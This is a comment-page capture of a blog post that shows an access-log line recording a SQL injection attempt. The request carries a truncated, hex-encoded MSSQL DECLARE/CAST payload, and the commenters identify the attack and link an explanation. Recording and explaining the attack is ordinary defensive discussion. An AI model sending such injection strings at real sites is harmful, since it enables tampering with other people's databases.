DISQUS

DISQUS Hello! dmiessler.com | grep understanding is using DISQUS, a powerful comment system, to manage its comments. Learn more.

Community Page

dmiessler.com | grep understanding

dmiessler.com/about/
Jump to original thread »
Author

Look What I Just Found In My Access.log

Started by Daniel Miessler · 7 months ago

75.152.146.229 - - [17/Aug/2008:00:38:12 -0400] "GET /blog/2004/09?;DeCLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F ... Continue reading »

3 comments

  • What.... They just wanted you to check out their uber-leet c00l piece of javascript, you're not interested?...


    But it's really cool...


    Oh, OK, how about this great TRS-80 I got back here, I'll toss in a tape deck for free?? :)

  • Sorry, I was bored ;-)

  • Its the latest MSSQL server injection hack whereby it messes up all existing character based columns. Details are here:


    http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-And-ASCII


    It seems that a lot of ColdFusion + MSSQL users have been particularly hit hard.

Add New Comment

Returning? Login